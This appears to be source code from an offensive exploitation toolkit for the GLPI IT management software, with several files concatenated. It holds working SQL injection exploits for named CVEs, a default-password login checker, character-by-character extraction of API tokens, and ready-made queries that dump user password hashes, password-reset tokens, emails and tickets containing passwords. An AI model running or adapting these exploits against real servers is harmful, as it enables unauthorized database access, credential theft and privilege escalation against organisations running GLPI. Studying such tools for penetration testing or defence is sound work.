import time
from http import HTTPStatus
from ..update_sql_injection_mixin import UpdateSqlInjectionMixin
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2024_37148(UpdateSqlInjectionMixin):
    """
    This CVE abuse a SQL Injection in an update clause to elevate the privilege of the current user

    @author BOREL Enzo
    @cvss 8.1
    @name CVE_2024_37148
    """
    min_version = "0.85"
    max_version = "10.0.16"
    _impacts = "SQLi, Privilege Escalation, Database Leak"
    _privilege = "User"
    _is_check_opsec_safe = False # Check is not opsec safe as it update some table fields

    def __init__(self, glpi_session):
        super().__init__(glpi_session, field="display_options")

    def _make_payload(self, field, payload, condition):
        """
        Make the sql payload ready to be injected

        :param field: In which field to store the result
        :type field: str

        :param payload: The sql payload to use, Do not use `FROM glpi_users` inside as
          it will break the sql syntax
        :type payload: str

        :param condition: The condition which is mandatory, to not apply an update everywhere
        :type condition: str
        """
        return f'\', display_options=NULL, {field}={payload} WHERE {condition}; -- '

    def send_payload(self, payload):
        """
        Send the payload to the target

        :param payload: The payload to send
        :type payload: str
        """

        # Need relogin at each sqlinjection, or else the polluted session kill the payload
        self.glpi_session.logout()
        self.glpi_session.login_with_credentials()

        return self.get(f"/front/display.options.php?itemtype=NetworkPort&update=&sub_itemtype={payload}")



from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.utils import GlpiUtils, LoginResult
from glpwnme.exploits.logger import Log

class DEFAULT_PASSWORD_CHECK(GlpiExploit):
    """
    This class just test for the default credentials of the account

    @author glpi
    @cvss 6.0
    @name DEFAULT_PASSWORD_CHECK
    """
    _impacts = "Authentication Bypass"
    _is_check_opsec_safe = False # Check is not opsec safe as it try to login 4 times
    default_credentials = {"glpi": "glpi",
                           "tech": "tech",
                           "normal": "normal",
                           "post-only": "postonly"}

    def check(self):
        """
        Check if the target is vulnerable

        :return: Whether or not the exploit succeeded
        :rtype: bool
        """
        are_account_valid = False
        for username, password in self.default_credentials.items():
            login_status = self.glpi_session.login(username, password, others={"auth":"local"}, verbose=False, no_auto=True)
            if login_status in (LoginResult.SUCCESS, LoginResult.MFA_REQUIRED):
                msg = f"Authentication successfull for {username}:{password}"
                if login_status == LoginResult.MFA_REQUIRED:
                    msg += " ([b cyan]MFA enabled[/])"
                Log.msg(msg)
                are_account_valid = True
                self.glpi_session.logout()
        return are_account_valid

    def run(self):
        """
        Run the exploit on the target, this actually is the same as the check
        """
        are_account_valid = False
        for username, password in self.default_credentials.items():
            login_status = self.glpi_session.login(username, password, others={"auth":"local"}, verbose=False, no_auto=True)
            if login_status in (LoginResult.SUCCESS, LoginResult.MFA_REQUIRED):
                msg = f"Authentication successfull for {username}:{password}"
                if login_status == LoginResult.MFA_REQUIRED:
                    msg += " ([b cyan]MFA enabled[/])"
                Log.msg(msg)
                are_account_valid = True
            else:
                Log.err(f"Authentication failed for {username}:{password}")
        return are_account_valid



from enum import Enum
from http import HTTPStatus
from urllib.parse import quote
from glpwnme.exploits.requirements import DefaultVersion
from glpwnme.exploits.plugin_exploit import PluginExploit
from glpwnme.exploits.logger import Log

class CVE_2025_32786(PluginExploit):
    """
    This CVE abuses a SQL Injection in glpiinventory plugin

    @author RIOUX Guilhem
    @cvss 7.2
    @name CVE_2025_32786
    """
    plugin_name = "glpiinventory"
    max_plugin_version = "1.5.1"
    _impacts = "Unauthenticated SQL Injection"
    device_id = "4565463212316513515"

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit abuse a SQL Injection.\n"
        infos += "It uses boolean-based method to extract data.\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [italic]sql (default 'SELECT VERSION()')[/italic]: The SQL command to execute\n"
        infos += " - [italic]agent_id (default '1')[/italic]: The id of an existing agent\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Execute the sql query `select user()` on the target[/]\n"
        infos += "--run -O sql='select user()'\n\n"
        infos += "[grey66]# Query for recovering only non null password of a table[/]\n"
        infos += "--run -O sql=\"SELECT CONCAT(name,':',password) FROM glpi_users WHERE password IS NOT NULL AND password <> '' LIMIT 1 OFFSET 1\"\n\n"
        infos += "[grey66]# Query for recovering all username using agent_id[/]\n"
        infos += "--run -O sql=\"SELECT GROUP_CONCAT(name) FROM glpi_users\" agent_id=2\n"

        infos += "\n[u]Note:[/u]\n"
        infos += "The vulnerability works against both [b]glpiinventory[/b] and [b]fusioninventory[/b].\n"
        infos += "However the exploit is not implemented for [b]fusioninventory[/b].\n"
        infos += "[b]For this exploit to work, you requires a valid agent id.[/b]\n"

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def get_plugin_version(self):
        """
        Function that retrieve the version of the plugin
        By default this function return the version of plugin_name.xml
        """
        res = self.plugin_get(f"/front/plugin_fusioninventory.communication.php?action=yest&machineid=45645",
                              allow_redirects=False)
        header = res.headers.get("server-type")
        if header:
            version = header.strip().split(" ")[-1]
            return version
        return None

    def _plugins_exists(self, endpoint):
        """
        Check if the plugin exists given an endpoint, set the attribute to know that
        the plugin actually exists, and returns it at every other calls

        :return: True if the plugin exists, False otherwise
        :rtype: bool
        :meta: public
        """
        res = self.get(f"/{endpoint}/{self.__class__.plugin_name}/front/plugin_fusioninventory.communication.php?action=yest&machineid=45645",
                       allow_redirects=False)
        if res.status_code != HTTPStatus.NOT_FOUND:
            return True
        return False

    def _build_payload(self, sql, agent_id):
        """
        Build the sql payload

        :param sql: The sql payload to extract (SELECT VERSION())
        :type sql: str
        """
        template_payload = "' OR id=(SELECT(IF({sql},{agent_id},NULL))) OR deviceid=(SELECT(IF({sql},{machine_id},NULL))); -- -'"
        payload_sql = "?action=setStatus&"
        payload_sql += "machineid=" + quote(template_payload.format(sql=sql,
                                                                    agent_id=agent_id,
                                                                    machine_id=self.__class__.device_id))
        payload_sql += "&uuid=test&sendheaders=1"
        return payload_sql

    def _is_result_ok(self, res):
        """
        Check if the sql injection works
        The result shall be 200 when success else 400
        """
        return res.status_code == HTTPStatus.OK

    def _add_agent(self):
        """
        Add an agent on remote target

        :return: The success of the operation
        :rtype: bool
        """
        payload_xml = f"<?xml version='1.0' encoding='UTF-8'?><REQUEST><deviceid>{self.__class__.device_id}</deviceid><QUERY>contact</QUERY></REQUEST>"
        res = self.plugin_post("/front/plugin_fusioninventory.communication.php/ajax/",
                               data=payload_xml)
        return res.text.lower().find("<status>ok</status>") >= 0

    def _run_sql_payload(self, payload, agent_id):
        """
        Workflow for running sql payload
        """
        payload = self._build_payload(payload, agent_id)
        result = self.plugin_get("/b/deploy/index.php" + payload, allow_redirects=False)
        return self._is_result_ok(result)

    def count_char(self, sql, agent_id):
        """
        Count how many chars contains the result
        The length will be calculate through Dichotomie

        :param sql: The sql payload given by the user
        :type sql: str

        :return: The number of char in the result
        :rtype: int
        """
        length_payload = f"LENGTH({sql})>{{length}}"
        previous_length = 0
        try_length = 20
        max_iter = 11
        for i in range(max_iter):
            if self._run_sql_payload(length_payload.format(length=str(try_length)), agent_id):
                previous_length = try_length
                try_length *= 2

            elif i == max_iter-1:
                Log.err(f"Max iterations reached, aborting, size exceeding: {str(try_length)}")
                exit(1)
            else:
                break

        return self.dichotomi(length_payload, previous_length, try_length, agent_id)

    def dichotomi(self, payload, previous_length, try_length, agent_id):
        """
        Run dichotomi research from a payload
        The payload must contains a placeholder {length}
        """
        while previous_length <= try_length:
            mid = (try_length + previous_length) // 2
            result = self._run_sql_payload(payload.format(length=str(mid)), agent_id)
            if result:
                previous_length = mid + 1
            else:
                try_length = mid-1
        return previous_length

    def sqli(self, payload, length_result, agent_id):
        """
        Exploit the sqli boolean based
        """
        res = ""
        partial_res = ""
        for i in range(1, length_result + 1):
            char_payload = f"ASCII(SUBSTR({payload}, {i}, 1))>{{length}}"
            partial_res += chr(self.dichotomi(char_payload, 0, 255, agent_id))
            Log.msg(f"Current result: [gold3]{partial_res}[/]", end="\r")
            if len(partial_res) > 50:
                res += partial_res
                partial_res = ""
                print()
        res += partial_res
        return res

    def run(self, sql="SELECT VERSION()", agent_id="1"):
        """
        Run the exploit on the target
        """
        if not self.check():
            Log.err("Target is not vulnerable")
            return False

        res = self.plugin_get("b/deploy/index.php")
        if 'Inventory is disabled' in res.text:
            Log.err("It seems inventory is installed but not enabled...")
            exit()

        if not self.glpi_plugin_version:
            Log.err("Cannot recover plugin version, plugin is not enabled")
            exit()

        sql = f"({sql})"

        Log.msg(f"Executing SQL Payload: {sql}")
        length_result = self.count_char(sql, agent_id)

        if length_result == 0:
            Log.err(f"Result is empty")
            Log.log("Maybe no agent are available on the target")
            if input("Do you wanna try to add an agent (requires inventory enable) ? (y/n) ").lower() == "y":
                Log.log("Trying to add an agent on the target")
                if self._add_agent():
                    Log.msg(f"Successfully added agent")
                    self._write_log(f"Agent added with device_id: {self.__class__.device_id}")
                    length_result = self.count_char(sql, agent_id)
                    if length_result == 0:
                        Log.err("Every attempts failed...")
                else:
                    Log.err("Failed to add agent")

            else:
                exit(1)

        Log.msg(f"Length of result: {length_result}")
        result = self.sqli(sql, length_result, agent_id)
        print(f"\x1b[K", end="\r")
        Log.msg(f"Final result:\n{result}")



import re
import json
import readline
import time
from urllib.parse import urlparse
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from glpwnme.exploits.sql_injection_mixin import SqlInjectionMixin

class CVE_2025_24799(GlpiExploit):
    """
    This CVE abuses an SQL Injection in the inventory feature
    Learn more:
      - https://blog.lexfo.fr/glpi-sql-to-rce.html

    @author rz
    @cvss 7.5
    @name CVE_2025_24799
    """
    _impacts = "SQL Injection"
    min_version = "10.0.0"
    max_version = "10.0.18"
    require_inventory = True
    _is_check_opsec_safe = False

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allows you to recover database information through SQL Injection\n"
        infos += "It uses a SQL Injection time based to extract datas\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]sql (default 'SELECT VERSION')[/i]: The sql query to run\n"
        infos += " - [i]time (default '3')[/i]: The number of seconds used in time-based\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += SqlInjectionMixin.get_help_usage()

        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def _run_sql_injection(self, payload, time_used):
        """
        Run the sql injection and check if it worked or not

        :param payload: The sql payload to add (exemple: )
        :type payload: str

        :return: True or False regarding the SQL Injection
        :rtype: bool
        """
        sql_payload = '<?xml version="1.0" encoding="UTF-8"?>'
        sql_payload += "<xml><QUERY>get_params</QUERY>"
        sql_payload += f"<deviceid>' UNION ALL SELECT IF({payload},SLEEP({time_used}),1) -- -'</deviceid>"
        sql_payload += "<content>fake</content>"
        sql_payload += "</xml>"

        a = time.time()
        res = self.glpi_session.sess.post(self.glpi_session._get_url("/front/inventory.php"),
                                          headers={"Content-Type": "application/xml"},
                                          data=sql_payload,
                                          verify=False)
        if time.time() - a > float(time_used):
            return True
        return False

    def dichotomi(self, payload, previous_length, try_length, time):
        """
        Run dichotomi research from a payload
        The payload must contains a placeholder {length}
        """
        while previous_length <= try_length:
            mid = (try_length + previous_length) // 2
            result = self._run_sql_injection(payload.format(length=str(mid)), time)
            if result:
                previous_length = mid + 1
            else:
                try_length = mid-1
        return previous_length

    def count_char(self, sql, time):
        """
        Count how many chars contains the result
        The length will be calculate through Dichotomie

        :param sql: The sql payload given by the user
        :type sql: str

        :return: The number of char in the result
        :rtype: int
        """
        length_payload = f"LENGTH({sql})>{{length}}"
        previous_length = 0
        try_length = 20
        max_iter = 11
        for i in range(max_iter):
            if self._run_sql_injection(length_payload.format(length=str(try_length)), time):
                previous_length = try_length
                try_length *= 2

            elif i == max_iter-1:
                Log.err(f"Max iterations reached, aborting, size exceeding: {str(try_length)}")
                exit(1)
            else:
                break

        return self.dichotomi(length_payload, previous_length, try_length, time)

    def check(self):
        """
        Check if the target is vulnerable
        """
        return self._run_sql_injection("1=1", 3)

    def sqli(self, payload, length_result, time):
        """
        Exploit the sqli time based
        """
        res = ""
        for i in range(1, length_result + 1):
            char_payload = f"ASCII(SUBSTR({payload}, {i}, 1))>{{length}}"
            res += chr(self.dichotomi(char_payload, 0, 255, time))
            Log.msg(f"Current result: [gold3]{res}[/]", end="\r")
        return res

    def run(self, sql="SELECT VERSION()", time="3"):
        """
        Run the exploit on the target

        SQL Injection occurs here:
          SELECT `id` FROM `glpi_agents` WHERE `deviceid` = '{PAYLOAD}'
        """
        Log.msg(f"Trying to run SQL Query: {sql}")
        Log.msg(f"Sleeping {time} seconds")
        if '<' in sql or '>' in sql:
            Log.log("Special xml characters found, replacing them")
            sql = sql.replace('<', '&lt;').replace('>', '&gt;')
        sql = f"({sql})"
        result_size = self.count_char(sql, time)
        if result_size == 0:
            Log.err("Result is empty")
        else:
            Log.msg(f"Length of result: {str(result_size)}")
            result = self.sqli(sql, result_size, time)
            print(f"\x1b[K", end="\r")
            Log.msg(f"Final result:\n{result}")




from dataclasses import dataclass, field
from typing import Tuple

@dataclass(frozen=True)
class DefaultVersion:
    """Return the Default version number"""
    minimal = "0"
    maximal = "10000000000"

@dataclass(frozen=True)
class VersionRequirement:
    """
    Class containing the min version for the exploit
    and the max version.
    Default is always compatible
    """
    min_version: Tuple = (DefaultVersion.minimal, )
    max_version: Tuple = (DefaultVersion.maximal, )

    def is_default(self):
        """
        Check if the version is the default one or not
        """
        if len(self.min_version) == 1 and len(self.max_version) == 1:
            return self.min_version[0] == DefaultVersion.minimal \
                   and self.max_version[0] == DefaultVersion.maximal
        return False

@dataclass(frozen=True)
class Requirements:
    """
    Class containing all the requirement
    glpi_version is the version required for the glpi instance
    php_version is the version required for the php version used
    os_used is the os needed for the exploit
    api_status is whether or not the api is needed for the exploit
    require_inventory is whether or not the inventory is needed
    """
    glpi_version: VersionRequirement = VersionRequirement()
    php_version: VersionRequirement = VersionRequirement()
    plugin_version: VersionRequirement = VersionRequirement()
    os_used: str = "All"
    api_status: bool = False
    require_inventory: bool = False



import re
import os
import sys
import tty
import random
import termios
import selectors
from time import sleep
from dataclasses import dataclass
from threading import Thread, Event

class FrameLine:
    """
    Class representing a line of a frame for an ascii art

    The repl value must not contain ansi char
    """
    _re_ansi_char = re.compile(r"(\x1b|\\e|\\033)\[([\d;]+)m")

    def __init__(self, line, repl=None, values=None, random=True, padding_chars=" ", fixed=False):
        self.line = line
        self.repl = repl
        self.values = values
        self._random = random
        self._prev = None
        self.padding_chars = padding_chars
        self.fixed = fixed

    def no_ansi(self, val):
        """
        Remove ANSI seq from a string (works only with \x1b)
        """
        return re.sub(self.__class__._re_ansi_char, "", val)

    def padding(self, size):
        """
        Return the padding to use
        """
        if self.fixed:
            size = 0

        if isinstance(self.padding_chars, list):
            return "".join([random.choice(self.padding_chars) for _ in range(size)])
        return self.padding_chars * size

    def get(self, pos=0):
        """
        Get the string of the line
        """
        if self.repl:
            if self._random:
                replacement = random.choice(self.values)
            else:
                if self._prev:
                    replacement_pos = self.values.index(self._prev) + 1
                    if replacement_pos == len(self.values):
                        replacement = self.values[0]
                    else:
                        replacement = self.values[replacement_pos]
                else:
                    replacement = self.values[0]
                self._prev = replacement

            diff = len(self.repl) - len(self.no_ansi(replacement))
            line = self.line.replace(self.repl, replacement)
            if diff > 0:
                return self.padding(diff + pos) + line
            if diff == 0:
                return self.padding(pos) + line

            diff = abs(diff)
            if diff >= pos:
                # Trop de char ajoute par rapport à la taille présente
                # Il faut supprimer un bout de ligne pour
                return line[diff - pos:]
            return self.padding(pos-diff) + line
        return self.padding(pos) + self.line

class Frame:
    """
    Class representing an ascii art frame
    """
    def __init__(self, frames_lines_list):
        self.frame_lines = []
        for frame_line in frames_lines_list:
            if isinstance(frame_line, str):
                self.frame_lines.append(FrameLine(frame_line))
            else:
                self.frame_lines.append(frame_line)
        self.height = len(self.frame_lines) - 1

    def get(self, pos):
        """
        Show the representation of the frame at the given pos
        """
        return "\n".join([frame_line.get(pos) for frame_line in self.frame_lines])

class InputReader(Thread):
    """
    Class that read inputs from the terminal answers

    Code largely inspired by:
    https://github.com/Textualize/textual/blob/main/src/textual/drivers/_input_reader_linux.py
        'Thanks for the project by the way :D'
    """
    def __init__(self, timeout=0.2):
        super().__init__()
        self.buffer = b""
        self.timeout = timeout
        self._fileno = sys.__stdin__.fileno()
        self._selector = selectors.DefaultSelector()
        self._selector.register(self._fileno, selectors.EVENT_READ)
        self._exit_event = Event()
        self._started_event = Event()
        self.__old_attrs = termios.tcgetattr(self._fileno)

    @property
    def is_started(self):
        return self._started_event.is_set()

    def close(self):
        """
        Close the thread
        """
        self._exit_event.set()

    def read(self):
        """
        Read input and return the generator
        """
        while not self._exit_event.is_set():
            for key, events in self._selector.select(self.timeout):
                if events & selectors.EVENT_READ:
                    data = os.read(self._fileno, 1024)
                    if not data:
                        return
                    yield data
            yield b""

    def run(self):
        """
        Start listening for stdin answer
        """
        tty.setraw(self._fileno)

        try:
            self._started_event.set()
            for data in self.read():
                self.buffer += data

        except Exception:
            pass

        finally:
            termios.tcsetattr(self._fileno, termios.TCSANOW, self.__old_attrs)

@dataclass
class RGB:
    """Class holding color value"""
    red: str = "00"
    green: str = "00"
    blue: str = "00"

class TermAsk:
    """
    This class is able to get the answer of a terminal
    """
    FOREGROUND_TERM_COLOR = "\x1b]10;?\a"
    BACKGROUND_TERM_COLOR = "\x1b]11;?\a"
    _re_rgb_term = rb";rgb:(?P<red>[a-f0-9]+)/(?P<green>[a-f0-9]+)/(?P<blue>[a-f0-9]+)"

    @classmethod
    def get(cls, question):
        """
        Return the patterns to use for the current question
        """
        question = question.lower()
        if question in ("bg", "background"):
            return (cls.BACKGROUND_TERM_COLOR, cls._re_rgb_term)
        if question in ("fg", "foreground"):
            return (cls.FOREGROUND_TERM_COLOR, cls._re_rgb_term)
        raise ValueError(f"Unknown terminal question: {question!r}")

    @staticmethod
    def extract(value, re_question):
        """
        Extract the different values
        """
        result = re.search(re_question, value)
        if result:
            red = result.group("red")[:2].decode('utf-8', 'ignore')
            green = result.group("green")[:2].decode('utf-8', 'ignore')
            blue = result.group("blue")[:2].decode('utf-8', 'ignore')
            return RGB(red, green, blue)
        return RGB()

    @classmethod
    def ask_rgb(cls, question="bg"):
        """
        Ask the terminal and get the answer
        """
        question, re_question = cls.get(question)
        reader = InputReader()
        reader.start()
        while not reader.is_started:
            pass
        print(question, end="\n\x1b[A")
        reader.close()
        reader.join()
        return cls.extract(reader.buffer, re_question)

class AnimatedObject(Thread):
    """
    Animated object class
    """
    def __init__(self, steps, default_duration="0.5", listeners=None):
        super().__init__()
        self.steps = steps
        self.default_duration = default_duration
        self._exit_event = Event()
        self._listeners = listeners

    def add_listener(self, listener):
        """
        Add a listener to the animated background
        """
        if not callable(getattr(listener, "notify")):
            raise ValueError(f"Listener {listener!r} must have a notify method")
        self._listeners.append(listener)

    def notify(self, bg):
        """
        Notify any listener
        """
        if self._listeners:
            for listener in self._listeners:
                listener.notify(bg)

    def stop(self):
        self._exit_event.set()

class AnimatedBackground(AnimatedObject):
    """
    Class that allows background animation
    """
    def __init__(self, steps, default_duration="0.5", listeners=None):
        super().__init__(steps, default_duration, listeners)
        self._init_state = TermAsk.ask_rgb("background")
        self.__background_payload = "\x1b]11;#{red}{green}{blue}\a"

    def set_background(self, rgb):
        """
        Set the background to the given rgb values
        """
        if isinstance(rgb, str):
            if rgb.startswith("#"):
                rgb = rgb[1:]
            rgb = RGB(rgb[:2], rgb[2:4], rgb[4:])

        sys.stdout.write(self.__background_payload.format(red=rgb.red,
                                                          green=rgb.green,
                                                          blue=rgb.blue))
        sys.stdout.flush()

    def run(self):
        """
        Animate the backround
        """
        Continue = True
        while Continue:
            for step in self.steps:
                if self._exit_event.is_set():
                    Continue = False
                    break
                self.set_background(step["rgb"])
                self.notify(step["rgb"])
                sleep_time = step.get("duration", self.default_duration)
                if isinstance(sleep_time, str):
                    sleep_time = float(sleep_time)
                sleep(sleep_time)

    def _reset(self):
        """
        Reset term to initial background
        """
        self.set_background(self._init_state)

    def stop(self):
        self._exit_event.set()
        self._reset()

class AnimatedAscii(AnimatedObject):
    """
    Ascii art animated
    """
    def __init__(self, steps, default_duration="0.3", listeners=None,
                 move=True, init_pos=0, autoclear=False):
        super().__init__(steps, default_duration, listeners)
        self._move = move
        self.init_pos = init_pos
        self.autoclear = autoclear

    def set_frame(self, pos):
        """
        Set the frame at the pos to use
        """
        sys.stdout.write(self.steps.get(pos))
        sys.stdout.write(f"\x1b[{self.steps.height}A\r")
        sys.stdout.flush()

    def run(self):
        """
        Animate the backround
        """
        Continue = True
        position = self.init_pos
        while Continue:
            if self._exit_event.is_set():
                break
            self.set_frame(position)
            self.notify(self.steps)
            if isinstance(self.default_duration, str):
                self.default_duration = float(self.default_duration)
            sleep(self.default_duration)
            if self._move:
                position += 1
        if self.autoclear:
            for i in range(self.steps.height+1):
                sys.stdout.write("\x1b[2K\n")
            sys.stdout.write(f"\x1b[{self.steps.height}A\r")
        else:
            sys.stdout.write(f"\x1b[{self.steps.height}B\n")

class GlpwnmeAnime:
    """
    Glpwnme animation
    """
    duration = 5

    @classmethod
    def start(cls):
        """
        Start the animation
        """
        etincelles = ["`",
                      "\x1b[38;5;214m°\x1b[0m",
                      " ",
                      "\x1b[38;5;214m` °\x1b[0m",
                      "\x1b[38;5;214m ° \x1b[0m",
                      "\x1b[38;5;214m*\x1b[0m",
                      "`\x1b[31m*\x1b[0m"]

        title = FrameLine("\x1b[31m[+] Sending webshell into orbit...\x1b[0m", "...", [".\x1b[K", "..\x1b[K", "..."], fixed=True)
        rocket_1 = "     __"
        rocket_2 = FrameLine("  °  \\ \\_____",
                             "°",
                             values=etincelles)
        rocket_3 = FrameLine("  ###[\x1b[31m=\x1b[0m=__\\O/_>",
                             "###",
                             values=["\x1b[38;5;226m###\x1b[0m",
                                     "\x1b[38;5;226m###\x1b[38;5;214m##\x1b[0m",
                                     "\x1b[38;5;226m#\x1b[38;5;214m###\x1b[31m#\x1b[0m",
                                     "\x1b[38;5;226m##\x1b[38;5;214m##\x1b[0m",
                                     "\x1b[38;5;226m####\x1b[0m"]
                            )
        rocket_4 = FrameLine(" °   /_/\x1b[K", "°", values=etincelles)
        frame = Frame([title, rocket_1, rocket_2, rocket_3, rocket_4])
        animate_ascii = AnimatedAscii(frame, default_duration="0.1", autoclear=True)
        animate = AnimatedBackground([{"rgb": "#FF4500", "duration": "0.5"},
                                      {"rgb": "#000000", "duration": "0.5"},
                                      {"rgb": "#003B00", "duration": "0.5"}])

        animate.start()
        animate_ascii.start()

        sleep(cls.duration)

        animate.stop()
        animate.join()
        animate_ascii.stop()
        animate_ascii.join()



import string
from abc import ABC, abstractmethod
from .logger import Log

class SqlInjectionMixin(ABC):
    """
    Class helping for sql injection on glpi
    for boolean / time based SQLi
    """
    concat_id_char = string.digits + ','
    token_chars = string.digits + string.ascii_letters # Used by glpi for token generation
    separator = ',' # Th group_concat separator

    @abstractmethod
    def send_payload(self, payload):
        """
        Send the payload

        :param payload: The payload sql to send
        :type payload: str
        """
        raise NotImplementedError

    @abstractmethod
    def check_result(self, res):
        """
        Check if the payload worked given a result

        :return: The result of the injection
        :rtype: bool
        """
        raise NotImplementedError

    def payload_exists(self, payload):
        """
        Check if the payload have a result
        
        :return: Whether or not there are available api token in db
        :rtype: bool
        """
        payload = f"({payload}) IS NOT NULL"
        return self.check_result(self.send_payload(payload))

    def get_api_token(self, pos):
        """
        Get the api token at the position pos
        """
        payload = f"SELECT MID(api_token, $index$, 1) = BINARY \"$char$\" FROM glpi_users WHERE api_token is not NULL and is_active=1 and is_deleted=0 LIMIT 1 OFFSET {pos}"
        current_api_token = ""
        for index in range(1, 41):
            for char in self.token_chars:
                Log.log(f"API Token: [blue]{current_api_token}[/blue][red]{char}[/red]   ", end="\r")
                res = self.send_payload(
                            payload.replace("$char$", char).replace("$index$", str(index))
                        )
                if self.check_result(res):
                    current_api_token += char
                    break

                if char == self.token_chars[-1]:
                    # Problem, we could not find a valid value
                    Log.err(f"Problem, could not recover character, check through a proxy")
                    return None
        print()
        return current_api_token

    def enum_api_token_available(self):
        """
        Enum the api token in the databases

        :return: The list containing all the api tokens recovered
        :rtype: List[str]
        """
        index = 0
        current_api_token = []
        while True:
            payload = f"SELECT api_token FROM glpi_users WHERE api_token is not NULL and is_active=1 and is_deleted=0 LIMIT 1 OFFSET {index}"
            if self.payload_exists(payload):
                Log.msg(f"Api token found in DB, you might get an [b]account[/b] !!")
                current_api_token.append(self.get_api_token(index))
                index += 1

            else:
                break
        return current_api_token

    @staticmethod
    def get_help_usage():
        """
        Return a base help for SQL injection that can be used globally
        """
        infos = "[grey66]# Recover username, password on the target at a certain offset[/]\n"
        infos += "--run -O sql=\"SELECT CONCAT(name,':',password) FROM glpi_users WHERE password IS NOT NULL AND password <> '' LIMIT 1 OFFSET 1\"\n\n"

        infos += "[grey66]# Recover id, users which are [b]super-admin/admin[/b] using a time wait of 0.4 seconds[/]\n"
        infos += "--run -O time=0.4 sql=\"SELECT GROUP_CONCAT(CONCAT(u.id,':',u.name)) FROM glpi_users AS u JOIN glpi_profiles_users AS p ON u.id = p.users_id WHERE p.profiles_id IN (3,4) AND  u.is_active = 1\"\n\n"

        infos += "[grey66]# Recover email, profileId and id of users that can be targeted for password reset exploit[/]\n"
        infos += "--run -O time=0.4 sql=\"SELECT GROUP_CONCAT(CONCAT(m.email,':',p.id,':',u.id)) "
        infos += "FROM glpi_users AS u JOIN glpi_profiles_users AS p JOIN glpi_useremails AS m ON u.id = p.users_id "
        infos += "WHERE p.id = 2 AND u.is_active = 1\"\n\n"

        infos += "[grey66]# Recover users which can be targeted for password reset attack (Profile other than Self-Service)[/]\n"
        infos += "--run -O time=0.4 sql=\"SELECT GROUP_CONCAT(CONCAT(u.id,':',name,':',p.id)) FROM glpi_users AS u JOIN glpi_profiles_users AS p ON u.id = p.users_id WHERE p.id != 3 AND u.authtype = 1 AND u.is_active = 1\"\n\n"

        infos += "[grey66]# Recover password_forget_token of a user named admin[/]\n"
        infos += "--run -O sql=\"SELECT password_forget_token FROM glpi_users WHERE name='admin'\"\n\n"

        infos += "[grey66]# Recover emails[/]\n"
        infos += "--run -O sql=\"SELECT CONCAT(users_id, ':', email) FROM glpi_useremails LIMIT 1\"\n\n"

        infos += "[grey66]# Recover tickets containing 'pass'[/]\n"
        infos += "--run -O sql=\"SELECT GROUP_CONCAT(CONCAT('Ticket#', t.id, ' - ', t.name, t.content, f.content) SEPARATOR '\\n') AS result FROM glpi_tickets t LEFT JOIN glpi_itilfollowups f ON f.items_id = t.id AND f.itemtype = 'Ticket' LEFT JOIN glpi_itilsolutions s ON s.items_id = t.id AND s.itemtype = 'Ticket' WHERE t.content LIKE '%pass%' OR t.name LIKE '%pass%' OR f.content LIKE '%pass%' OR s.content LIKE '%pass%'\"\n"
        return infos



import re
import html
import requests
from http import HTTPStatus
from packaging import version
from urllib.parse import urlparse
from glpwnme.exploits.privileges import Privs
from glpwnme.exploits.logger import Log
from glpwnme.exploits.utils.glpi_server_auth import AnyAuthSession
from glpwnme.exploits.exceptions import BadCredentialsException, MissingMFAException
from .glpi_utils import GlpiUtils, GlpiInfos, skip_check_when_version, LoginResult
from .glpi_static_files_version import GlpiStaticFilesVersion
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

class GlpiSession:
    """
    Class handling the needed value for interacting
    with glpi
    """
    def __init__(self, target, proxies=None, headers=None, credentials=None, debug_request=False):
        self.sess = AnyAuthSession(credentials.server_user, credentials.server_password)
        self.profiles = []
        self.target = GlpiUtils.parse_target(target)
        if proxies is not None:
            self.sess.proxies = {"http": proxies, "https": proxies}

        if headers is not None:
            self.sess.headers.update(headers)
        self.sess.headers.update({"Accept-Language": "en_GB"})

        self.credentials = None
        if credentials is not None:
            self.credentials = credentials

        self.login_infos = {"after_login_url": None, "after_login_response": None}

        self.privilege = Privs["Unauthenticated"]
        self.glpi_infos = GlpiInfos()

        self.current_url = self.target
        self.skip_check = False

        self.sess.hooks['response'].append(self.custom_hook)
        self.debug_request = debug_request
        self.csrf_token = ""

    def custom_hook(self, r, *args, **kwargs):
        """
        Set the current url at each request to keep track of it
        It also avoid to do a get requests each time you need to know where you are

        Also set the nearest version of glpi that was found
        which can be checked given the cookie's length

        :param r: The response to the request
        :type r: class:`Response`
        """
        self.current_url = r.url

        if self.debug_request:
            Log.log(f"DEBUG REQUEST")
            Log.print(f"[cyan]{r.request.method}[/cyan] {r.url}")
            for hname, hval in r.request.headers.items():
                Log.print(f"[b]{hname}:[/b] {hval}")
            if r.request.body:
                print()
                print(r.request.body)
            Log.log(f"Got response HTTP/{r.status_code}")
            print()

        # First, shall we rotate CSRF token
        if r.request.body:
            body = r.request.body.decode(errors="ignore") if isinstance(r.request.body, bytes) else r.request.body
            if "_glpi_csrf_token=" in body or r.request.headers.get("X-Glpi-Csrf-Token") is not None:
                # CSRF token has been consumed by the request
                self.csrf_token = ""
                if r.status_code == HTTPStatus.OK:
                    # Newly available csrf token shall be in the response
                    self.csrf_token = GlpiUtils.extract_csrf(r.content)

        # If nearest version is not defined
        if self.glpi_infos.glpi_nearest_version is None:
            if r.headers.get("Set-Cookie"):
                self.get_nearest_glpi_version_from_cookie(r.headers.get("Set-Cookie"))

            if r.request.headers.get("Cookie"):
                if self.glpi_infos.glpi_nearest_version is None:
                    self.get_nearest_glpi_version_from_cookie(r.request.headers.get("Cookie"))

        # If no plugins has been found, then initialized them
